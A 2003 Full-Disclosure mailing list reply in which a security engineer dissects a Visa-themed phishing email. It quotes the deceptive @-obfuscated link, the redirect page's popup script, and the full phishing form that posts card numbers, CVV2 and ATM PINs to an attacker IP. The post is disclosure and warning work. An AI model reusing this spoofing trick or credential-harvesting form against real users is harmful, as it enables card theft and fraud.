Re: [Full-Disclosure] visa XSS?

Tue, 23 Dec 2003 07:41:26 -0800



Mauro Flores wrote:

I receive this mail today, the funny stuff is that when you click on the
link, you execute:
http://www.visa.com:UserSession=2f6q9uuu88312264trzzz55884495&useroption=SecurityUpdate&[EMAIL
 PROTECTED]/~gotier/verified_by_visa.htm

I don't have a Visa card and I don't like that 64.21.80.2 which is not a
Visa IP, AFAIK.
Anyone else receive it??


Yeah. We just got one here. I missed the first part of this thread
so I don't know if I'm repeating stuff.

The original email came from an address registered in Korea.

Although the present web site redirects to the VISA site, if you look at
the source you'll find:

<HTML><HEAD>
<TITLE>Secure with Visa</TITLE>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<meta http-equiv='refresh' content='0; url=http://www.usa.visa.com/personal/privacy_policy/?it=ft_/personal/secure_with_visa/index.html'>
<BODY>
<script language="JavaScript">
<!--


//  alert("popali");
        window.name="spec";
        window.open("http://64.21.80.2/~gotier/r.php";, 'Visa', 
"resizable=no,scrollbars=no,width=425,height=198");  
//      window.focus();
//-->
</script>
</BODY></HTML>

And that r.php is a phish:

Please, enter your data info!<html>
<head>
<title>Enter your data</title>
</head>
<body>
<br>
<form method=post action=http://64.21.80.2/~gotier/r.php>
Credit Card No. <input type=text name=cc value=''><br>
CVV2 <input type=text name=cvv2 value=''><br>
PIN-ATM CODE: <input type=text name=pin value=''><br>
Expiration Date: month : <select name=month>
<option value=01>01
<option value=02>02
<option value=03>03
<option value=04>04
<option value=05>05
<option value=06>06
<option value=07>07
<option value=08>08
<option value=09>09
<option value=10>10
<option value=11>11
<option value=12>12
</select> year : <select name=year>
<option value=2003>2003
<option value=2004>2004
<option value=2005>2005
<option value=2006>2006
<option value=2007>2007
<option value=2008>2008
<option value=2009>2009
<option value=2010>2010
<option value=2011>2011
<option value=2012>2012
</select>
<br><br>
<input type=submit value='Send');
</form>
</body>
</html>

--
Gary Flynn
Security Engineer - Technical Services
James Madison University


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Reply via email to